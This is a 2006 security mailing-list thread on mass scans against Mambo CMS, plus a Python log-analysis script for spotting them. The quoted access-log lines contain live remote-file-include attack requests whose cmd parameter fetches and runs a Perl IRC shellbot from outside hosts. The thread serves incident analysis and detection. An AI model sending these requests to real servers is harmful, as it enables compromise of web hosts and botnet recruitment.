Incidents
High volume of Mambo scans May 13 2006 01:36PM
Daniel Cid (danielcid yahoo com br) (4 replies)
Re: High volume of Mambo scans May 15 2006 03:01AM
Karl Schlitt (karl dakota-st com)
Re: High volume of Mambo scans May 15 2006 12:24AM
George A. Theall (theall tifaware com)
Re: High volume of Mambo scans May 14 2006 11:43PM
Peter Kosinar (goober ksp sk)
Re: High volume of Mambo scans May 14 2006 10:57PM
Jamie Riden (jamesr europe com)
Looks like some sort of shellbot wanting to connect to an IRC channel
#abusers on abuser.hacked.in:8080.

I've been seeing occasional probes for Mambo's index.php on and off
for a while now - the first part is similar to
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
payloads are slightly different, though it always seems to end up with
an IRC bot of some kind.

I usually see them coupled with scans for coppermine and other remote
include issues, plus xmlrpc probes.

I think you're seeing an attempt to exploit issue#3 here -
http://secunia.com/advisories/18935/

cheers,
Jamie

On 14/05/06, Daniel Cid <danielcid (at) yahoo.com (dot) br> wrote:
> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"

--
Jamie Riden / jamesr (at) europe (dot) com / jamie.riden (at) computer (dot) org
NZ Honeynet project - http://www.nz-honeynet.org/
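Jamie's diagnosis above (a remote include through mosConfig_absolute_path, followed by a wget/perl fetch of a bot) maps directly onto a check a defender can run over Apache access logs. The Python below is an added example, not code from the thread or from the NZ Honeynet project; the log lines, client IPs and hosts in SAMPLE_LOG are constructed placeholders modelled on Daniel's excerpts.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined-log prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<uri>\S+)[^"]*" (?P<status>\d{3})')
# Downloader invocations inside the cmd= chain; stop at shell separators.
FETCH_RE = re.compile(r'\b(?:wget|curl|fetch|lwp-download)\s+([^\s;|&]+)')

def parse_query(query):
    """Split on '&' before URL-decoding so the ';' chain inside cmd= stays intact."""
    params = {}
    for part in query.split('&'):
        key, _, value = part.partition('=')
        params[unquote(key)] = unquote(value)
    return params

def analyze(line):
    """Return a finding for a Mambo remote-include attempt, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_query(m.group('uri').partition('?')[2])
    include = params.get('mosConfig_absolute_path', '')
    if not include.lower().startswith(('http://', 'https://', 'ftp://')):
        return None                         # absent or local path: not the RFI pattern
    status = int(m.group('status'))
    return {
        'ip': m.group('ip'), 'ts': m.group('ts'), 'status': status,
        'include_url': include.rstrip('?'), 'include_host': urlsplit(include).hostname,
        # register_globals abuse seen in the thread: GLOBALS= reset plus _REQUEST[...] keys
        'globals_abuse': 'GLOBALS' in params or any(k.startswith('_REQUEST[') for k in params),
        'second_stage': [u.rstrip('?') for u in FETCH_RE.findall(params.get('cmd', ''))],
        # 404 = no index.php, a blind scan; a 2xx means Mambo answered and the host needs triage
        'needs_triage': 200 <= status < 300,
    }

def scan(lines):
    """Run analyze() over log lines; return findings plus the remote hosts they reference."""
    findings = [f for f in map(analyze, lines) if f]
    hosts = {f['include_host'] for f in findings}
    hosts.update(urlsplit(u).hostname for f in findings for u in f['second_stage'])
    return findings, sorted(h for h in hosts if h)

# Constructed sample lines modelled on the thread's excerpts; IPs and hosts are placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://payload.example/cmd.txt?&cmd='
    'cd%20/tmp;wget%20http://payload.example/bot;perl%20bot;rm%20-rf%20bot? HTTP/1.0" 404 167 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content'
    '&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://stage.example/tool.gif?&cmd='
    'cd%20/tmp/;wget%20http://stage.example/session.gif;perl%20session.gif? HTTP/1.0" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [12/May/2006:16:51:10 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
]
```

The hosts list doubles as a pull of the include and second-stage servers for blocking or takedown, while needs_triage separates blind scans against servers without Mambo from hits on hosts that actually ran index.php.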

Copyright 2009, SecurityFocus